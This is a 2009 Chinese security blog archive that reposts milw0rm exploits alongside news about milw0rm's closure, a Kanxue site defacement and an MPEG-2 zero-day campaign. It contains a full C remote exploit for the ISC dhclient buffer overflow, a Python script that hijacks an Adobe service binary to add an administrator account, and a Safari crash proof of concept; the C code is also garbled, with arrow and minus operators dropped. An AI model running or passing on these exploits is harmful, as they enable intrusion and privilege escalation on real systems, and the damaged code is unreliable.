分类 "网络安全" 的存档.

ISC DHCP dhclient < 3.1.2p1 远程缓冲区溢出漏洞

ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC
ISC DHCP是一款开源的DHCP服务实现。
ISC DHCP服务器不正确处理DHCP请求,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。

复制内容到剪贴板程序代码程序代码
/*
* cve-2009-0692.c
*
* ISC DHCP dhclient < 3.1.2p1 Remote Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
*   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692
*
*   Stack-based buffer overflow in the script_write_params method in
*   client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before
*   4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to
*   execute arbitrary code via a crafted subnet-mask option.
*
* Usage:
*
*   $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet
*   $ sudo ./cve-2009-0692
*   [+] listening on eth0: ip and udp and src port 68 and dst port 67
*   [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920
*   [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920
*
*   $ gdb /sbin/dhclient
*   …
*   DHCPREQUEST on eth0 to 255.255.255.255 port 67
*   DHCPACK from 0.6.9.2
*   …
*   Program received signal SIGSEGV, Segmentation fault.
*   0x41414141 in ?? ()
*
* Notes:
*
*   Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3.  Feel free
*   to tweak for your target platform.  Depends on libdnet and libpcap.
*
*   READABLE_1 and READABLE_2 need to be readable addresses as we fix up the
*   stack during our overflow.  After a successful return from the vulnerable
*   script_write_params function, EIP will be set to JMP_TARGET.
*
*   Exclusively for use at DEFCON next week.  😉
*/

#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <dnet.h>
#include <pcap.h>

#define READABLE_1         "\xa8\xfc\x0b\x08" /* for es.client */
#define READABLE_2         "\xbc\x34\x0a\x08" /* for es.prefix */
#define JMP_TARGET         "\x41\x41\x41\x41"

#define BPF_FILTER         "ip and udp and src port 68 and dst port 67"
#define PKT_BUFSIZ         1514
#define DHCP_OP_REQUEST    1
#define DHCP_OP_REPLY      2
#define DHCP_TYPE_REQUEST  3
#define DHCP_TYPE_ACK      5
#define DHCP_OPT_REQIP     50
#define DHCP_OPT_MSGTYPE   53
#define DHCP_OPT_END       255
#define DHCP_CHADDR_LEN    16
#define SERVERNAME_LEN     64
#define BOOTFILE_LEN       128
#define DHCP_HDR_LEN       240
#define DHCP_OPT_HDR_LEN   2

#ifndef __GNUC__
# define __attribute__(x)
# pragma pack(1)
#endif

struct dhcp_hdr {
    uint8_t op;
    uint8_t hwtype;
    uint8_t hwlen;
    uint8_t hwopcount;
    uint32_t xid;
    uint16_t secs;
    uint16_t flags;
    uint32_t ciaddr;
    uint32_t yiaddr;
    uint32_t siaddr;
    uint32_t giaddr;
    uint8_t chaddr[DHCP_CHADDR_LEN];
    uint8_t servername[SERVERNAME_LEN];
    uint8_t bootfile[BOOTFILE_LEN];
    uint32_t cookie;
} __attribute__((__packed__));

struct dhcp_opt {
    uint8_t opt;
    uint8_t len;
} __attribute__((__packed__));

#ifndef __GNUC__
# pragma pack()
#endif

void
process(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)
{
    eth_t *raw;
    struct ip_hdr *ip_h;
    struct eth_hdr *eth_h;
    struct udp_hdr *udp_h;
    struct dhcp_hdr *dhcp_h;
    struct dhcp_opt *dhcp_opt;
    char *dev = data, *ptr;
    char pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];
    int opt_len, clen = pkthdr>caplen;
    uint8_t msg_type = 0, payload_len = 0;
    uint32_t yiaddr = 0;

    /* packet too short */
    if (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {
        return;
    }

    eth_h = (struct eth_hdr *) pkt;
    ip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);
    udp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);
    dhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);
    dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);

    /* only care about REQUEST opcodes */
    if (dhcp_h>op != DHCP_OP_REQUEST) {
        return;
    }

    /* parse DHCP options */
    while (1) {
        if (dhcp_opt>opt == DHCP_OPT_MSGTYPE) {
            if (dhcp_opt>len != 1) {
                return;
            }
            memcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt>len);
        }
        if (dhcp_opt>opt == DHCP_OPT_REQIP) {
            if (dhcp_opt>len != 4) {
                return;
            }
            memcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt>len);
        }
        if (dhcp_opt>opt == DHCP_OPT_END) {
            break;
        }
        if (((char *) dhcp_opt (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt>len > clen) {
            break;
        }
        dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt>len);
    }

    /* only care about REQUEST msg types */
    if (msg_type != DHCP_TYPE_REQUEST) {
        return;
    }

    printf("[+] snarfed DHCP request from %s with xid 0x%08x\n", eth_ntoa(&eth_h>eth_src), dhcp_h>xid);
    printf("[+] sending malicious DHCP response to %s with xid 0x%08x\n\n", eth_ntoa(&eth_h>eth_src), dhcp_h>xid);

    /* construct stack payload */
    memset(payload, 0, sizeof(payload));
    ptr = payload;
    memset(ptr, 0, 16);
    ptr += 16;
    memcpy(ptr, READABLE_1, 4);
    ptr += 4;
    memcpy(ptr, READABLE_2, 4);
    ptr += 4;
    memset(ptr, 0, 8);
    ptr += 8;
    memcpy(ptr, "\x04\x00\x00\x00", 4);
    ptr += 4;
    memset(ptr, 0, 28);
    ptr += 28;
    memcpy(ptr, JMP_TARGET, 4);
    ptr += 4;
    payload_len = ptr payload;

    /* dhcp header */
    dhcp_h>op = DHCP_OP_REPLY;
    memcpy(&dhcp_h>yiaddr, &yiaddr, 4);

    /* normal dhcp options */
    memset(options, 0, sizeof(options));
    ptr = options;
    memcpy(ptr, "\x35\x01\x05", 3);
    ptr += 3;
    memcpy(ptr, "\x36\x04\x00\x06\x09\x02", 6);
    ptr += 6;
    memcpy(ptr, "\x33\x04\x00\x09\x3a\x80", 6);
    ptr += 6;
    memcpy(ptr, "\x03\x04\x00\x06\x09\x02", 6);
    ptr += 6;
    memcpy(ptr, "\x06\x04\x00\x06\x09\x02", 6);
    ptr += 6;

    /* malicious subnet mask option */
    memcpy(ptr, "\x01", 1);
    ptr += 1;
    memcpy(ptr, &payload_len, 1);
    ptr += 1;
    memcpy(ptr, payload, payload_len);
    ptr += payload_len;

    memcpy(ptr, "\xff", 1);
    ptr += 1;
    opt_len = ptr options;

    /* construct full packet payload */
    memset(pktbuf, 0, sizeof(pktbuf));
    ptr = pktbuf;

    eth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\xc1\x1e\x20\x09\x06\x92", ETH_TYPE_IP);
    ptr += ETH_HDR_LEN;

    ip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);
    ptr += IP_HDR_LEN;

    udp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);
    ptr += UDP_HDR_LEN;

    memcpy(ptr, dhcp_h, DHCP_HDR_LEN);
    ptr += DHCP_HDR_LEN;

    memcpy(ptr, options, opt_len);
    ptr += opt_len;

    ip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);

    /* fire off malicious response */
    raw = eth_open(dev);
    if (!raw) {
        fprintf(stderr, "[-] error opening raw socket on %s\n", dev);
        exit(1);
    }
    eth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);
    eth_close(raw);
}

void
usage(char **argv)
{
    fprintf(stderr, "usage: %s [-i interface]\n", argv[0]);
    exit(1);
}

int
main(int argc, char **argv)
{
    int ch, ret;
    char *dev = NULL;
    char errbuf[PCAP_ERRBUF_SIZE];
    struct bpf_program bfp;
    pcap_t *ph;
    
    opterr = 0;

    while ((ch = getopt(argc, argv, "i:")) != 1) {
        switch (ch) {
        case 'i':
            dev = optarg;
            break;
        default:
            usage(argv);
        }
    }

    if (!dev) {
        dev = pcap_lookupdev(errbuf);
        if (!dev) {
            fprintf(stderr, "[-] couldn't find default interface: %s\n", errbuf);
            exit(1);
        }
    }

    ph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);
    if (!ph) {
        fprintf(stderr, "[-] couldn't open interface %s: %s\n", dev, errbuf);
        exit(1);
    }

    ret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);
    if (ret == 1) {
        fprintf(stderr, "[-] couldn't parse BPF filter: %s\n", pcap_geterr(ph));
        exit(1);
    }

    pcap_setfilter(ph, &bfp);
    if (ret == 1) {
        fprintf(stderr, "[-] couldn't set BPF filter: %s\n", pcap_geterr(ph));
        exit(1);
    }

    printf("[+] listening on %s: %s\n", dev, BPF_FILTER);

    pcap_loop(ph, 1, process, dev);

    return 0;
}

// milw0rm.com [2009-07-27]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/129

Adobe相关服务(getPlus_HelperSvc.exe)本地提权漏洞

描述:
Adobe下载者(此处指downloader文件)用来下载为Adobe应用程序下载更新
在Acrobat Reader9.x下测试
可执行文件可以被系统内置用户以提升为“完全控制”的系统权限来安装,任何用户都可以替换改文件来达到自己的目的。在系统重启后它将以"SYSTEM"权限运行。
description:
Adobe downloader used to download updates for Adobe applications.
Shipped with Acrobat Reader 9.x

poc:

C:\>sc qc "getPlus(R) Helper"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: getPlus(R) Helper
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : getPlus(R) Helper
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <————– [!!!]
                                           NT AUTHORITY\SYSTEM:F
The executable file is installed with improper permissions, with "full
control" for Builtin Users; a simple user can replace it with a binary of
choice.
At the next reboot it will run with SYSTEM privileges.

昨天Milw0rm上刚刚给出了Python的利用代码,内容如下:

复制内容到剪贴板程序代码程序代码
#!/usr/bin/env python
##################################################################################
#
# Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit
# Coded By: Dr_IDE
# Discovered by: Nine:Situations:Group
# Tested On: Windows XP SP2, Requires NOS Package Installed
# Usage: python Dr_IDE-Adobe_912.py
#
##################################################################################

import os, subprocess

#
# Should probably have a try block around this as not every install
# of 9.1.2 has the NOS package on it. This is a little touchy so you may have to
# play around with it.
#
# This is a super lame way to do this but it makes it more educational.
evil =  "echo *************************************************************\n"
evil += "echo *\n"
evil += "echo * Adobe Acrobat v9.1.2 Local Privilege Escalation Exploit\n"
evil += "echo * Coded By: Dr_IDE\n"
evil += "echo * Discovered By: Nine:Situations:Group\n"
evil += "echo * Tested On: Windows XP SP2\n"
evil += "echo *\n"
evil += "echo *************************************************************\n"
evil += "echo This will add user Dr_IDE:password to the Admin Group\n"
evil += "cd C:\\Program Files\\NOS\\bin\n"
evil += "copy /Y GetPlus_HelperSvc.exe GetPlus_HelperSvc.old\n"
evil += "copy /Y %systemroot%\\system32\\cmd.exe\n"
evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE password /ADD\n"
evil += "GetPlus_HelperSvc.exe /C net localgroup administrators Dr_IDE /ADD\n"
evil += "GetPlus_HelperSvc.exe /C net user Dr_IDE\n"
evil += "exit"

f1 = open('Dr_IDE-Adobe.bat','w');
f1.write(evil);
f1.close();

# Here are two ways to execute this exploit. If you leave both commented just the batch file is created.

# Silent Way – This should be more stealthy
#retval = subprocess.call("Dr_IDE-Adobe.bat");

# Louder Way – On some systems this will probably open a DOS window
#retval = os.system("Dr_IDE-Adobe.bat");

# milw0rm.com [2009-07-27]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/130

不知该说什么好–Milw0rm今天恢复开放

      昨天Milw0rm站长str0ke刚在首页宣布闭站,闹得满城风雨,众人正在叹息时,孰料今天突然恢复访问,重新接受投稿,并且是在没有任何通告的情况下。str0ke是想娱乐我们一下,说关就关说开就开?深度无语。
      以下是某牛人上发现的Milw0rm站长在Twitter上发布的消息:

引用内容 引用内容
      milw0rm's back up & posting will start once again, I can't let all of the emails in my submit box to just sit there

      顺便把Milw0rm数据库的下载地址放出来:
      点击下载Milw0rm exp数据库

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/145

国外著名安全漏洞公布站点milw0rm关闭

      又是一则安全网站的新闻,只是这则新闻要猛的多,安全界最大的0day站点Milw0rm.com今天宣布关闭,站长str0ke曾在首页公告如下:

引用内容 引用内容
      Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.
      Be safe, /str0ke

      现在网站已经不能打开。
      来个发布公告的首页截图:

Milw0rm宣布关闭首页截图

Milw0rm宣布关闭首页截图

      据说说可能跟前段时间在 milw0rm 上公布的 Lxadmin(现在的 kloxo) 的 exp 有关,当时那个 exp 使很多站被黑,数据被清空,最后导致 Lxadmin 的作者 Ligesh 自杀。

      本博的"网络安全"分类下很多安全代码都是源自Milw0rm,因为它是业内最及时、最权威的安全漏洞发布站点;前一段时间它还黑了国外另一著名商业安全站点astalavista.com;可惜不久自己却关张大吉。
      相关链接:
      Techie hangs himself in HSR Layout
      Webhost hack wipes out data for 100,000 sites

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/147

著名技术团体看雪学院今日被黑

      今天上午听说看雪出了问题,10:00上去一看,看雪的首页被临时替换成如下页面:

2009.7.8 10:00看雪首页

2009.7.8 10:00看雪首页

      在不到一个小时的时间内,看雪首页恢复。
      下午14:30左右看雪首页再次临时调整,显示正在迁移数据:

2009.7.8 14:30看雪首页

2009.7.8 14:30看雪首页

      但内部栏目如"资源下载"、"专业论坛"等仍能正常打开。
      不知这次事件是何许人物所为,上午看雪服务器根目录下曾有hacker.txt文件,但忘记截图,现已被删除。
      根据网站服务器IP查询其服务器上另有一个技术论坛:中国飘云阁初学者破解组织,此论坛目前运行正常。此论坛的简介是:
      飘云阁是由中国破解组织成员飘云等电脑爱好者共同发起成立的中国破解初学者组织,成立于2004年12月01日,旨在带领广大破解爱好者踏入密界大门,共同研究讨论软件解密技术,增强国产软件加密水平并使民族软件发扬光大。
      同服务器论坛未受到影响,证明服务器权限未被全部攻下,而下午看雪却在迁移网站数据,着实费解。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/148

网络惊现微软MPEG-2视频0day漏洞 大规模网络攻击爆发

      【赛迪网-IT技术报道】北京时间2009年7月5日中午12时消息,一起针对微软MPEG-2视频解析模块0day漏洞的大规模网络攻击已经爆发。截至5日中午12点,红星美凯龙官方网站、中视音像、中国电子科技集团公司第二研究所、齐鲁石化医院集团、中国皮具网、中国煤炭网、北京啄木鸟婚纱摄影集团、天津市第一中心医院、云南地产门户网、铁道兵网等967个网站的7740个网址已被黑客植入了相应的攻击代码,其中包括了大量的色情网站。

      据安全专家介绍,从7月4日中午12点以后,一种相同类型的网络攻击开始大量增加,到7月5日凌晨7点突然呈爆发态势。经专家验证,黑客利用了微软Windows操作系统 BDA Tuning Model MPEG2 Tune Request视频组件的一个0Day漏洞。

      当用户点击相应“挂马网页”时,恶意代码就会自动触发以上MPEG2视频组件的msvidctl.dll模块,相应地IE等浏览器会表现为卡死一小会儿,随后,电脑就会自动下载和运行一系列黑客预先设置好的木马程序,期间会出现恶意代码会强制关闭有大部分安全软件、劫持IE首页、弹出广告页面等各种现象。

      据介绍,该漏洞与今年5月下旬的微软“DirectShow视频开发包”0day漏洞相似,都是通过浏览器来触发的漏洞。但不同的是,这个MPEG-2 0Day漏洞要容易利用得多,而且黑客不再需要网民运行任何恶意视频文件就能使其电脑变为任由黑客摆布的“肉鸡”。这种攻击方式更为隐蔽,普通用户更难防范,因而会更容易受到木马产业链等不法分子的青睐。另外,从目前测试的结果来看,由于VISTA、Windows2008以及WIN7使用了SAFESEH/GSCOOKIE技术,该0Day漏洞主要影响的是用户量最大的Windows XP系统。

      目前微软官方尚未发布补丁,0point在此提醒广大网友开启杀毒软件、防火墙并及时更新病毒库,尽量避免访问不良网站。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/150

Apple Safari 4.x JavaScript重载拒绝服务漏洞

___________________________________________________________________________________

Apple Safari 4.x JavaScript Reload Denial of Service
___________________________________________________________________________________

Author   : Marcell 'SkyOut' Dietl, Achim Hoffmann
Email    : mail [at] marcell-dietl [dot] de
Vendor   : http://www.apple.com/
Product  : http://www.apple.com/safari/
Found    : 12.06.2009
Released : 01.07.2009

Tested on:
– Safari 4.0 at Windows XP SP3
– Safari 4.0.1 at Mac OS X 10.5.7
___________________________________________________________________________________
STEPS TO REPRODUCE

1) Create a HTML file with the following content:

+———-
| <html>
| <body>
| <script src="empty.js"></script>
| <script>
| try { crashSafari(); } catch(e) {
| setTimeout("location.reload();",42);
| prompt('apple culpa? comment:'); }
| </script>
| </body>
| </html>
+———-

2) Create an empty file called "empty.js" in the same directory.

3) Put both files into the WWW directory of your server.

4) Access the HTML file with your browser.
   – A popup will appear: Close it.
   – A popup will appear: Close it.
   – Crash.

5) On Windows:

+———-
| AppName: safari.exe      AppVer: 4.530.17.0      ModName: webkit.dll
| ModVer: 4.530.17.0       Offset: 00305f55
+———-

5) On Mac OS X:

+———-
| Process:         Safari [298]
| Path:            /Applications/Safari.app/Contents/MacOS/Safari
| Identifier:      com.apple.Safari
| Version:         4.0.1 (5530.18)
| Build Info:      WebBrowser-55301800~1
| Code Type:       X86 (Native)
| Parent Process:  launchd [163]
|
| Date/Time:       2009-07-01 00:58:48.144 +0200
| OS Version:      Mac OS X 10.5.7 (9J61)
| Report Version:  6
|
| Exception Type:  EXC_BAD_ACCESS (SIGBUS)
| Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000002
|
| Thread 0 crashed with X86 Thread State (32-bit):
|   eax: 0x00000002  ebx: 0x900bac11  ecx: 0x00625eec  edx: 0x00000000
|   edi: 0x00625ec8  esi: 0x00000002  ebp: 0xbfffe778  esp: 0xbfffe5e0
|    ss: 0x0000001f  efl: 0x00010217  eip: 0x900bac74   cs: 0x00000017
|    ds: 0x0000001f   es: 0x0000001f   fs: 0x00000000   gs: 0x00000037
|   cr2: 0x00000002
+———-
___________________________________________________________________________________
Advisory  : http://marcell-dietl.de/index/adv_safari_4_x_js_reload_dos.php

Live Demo : http://marcell-dietl.de/index/demo_safari_4_x_js_reload_dos.html

Apple has been informed about the bug, but did not show any interest.
___________________________________________________________________________________
HAVING FUN WITH FULL DISCLOSURE SINCE 2006

# milw0rm.com [2009-07-02]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/154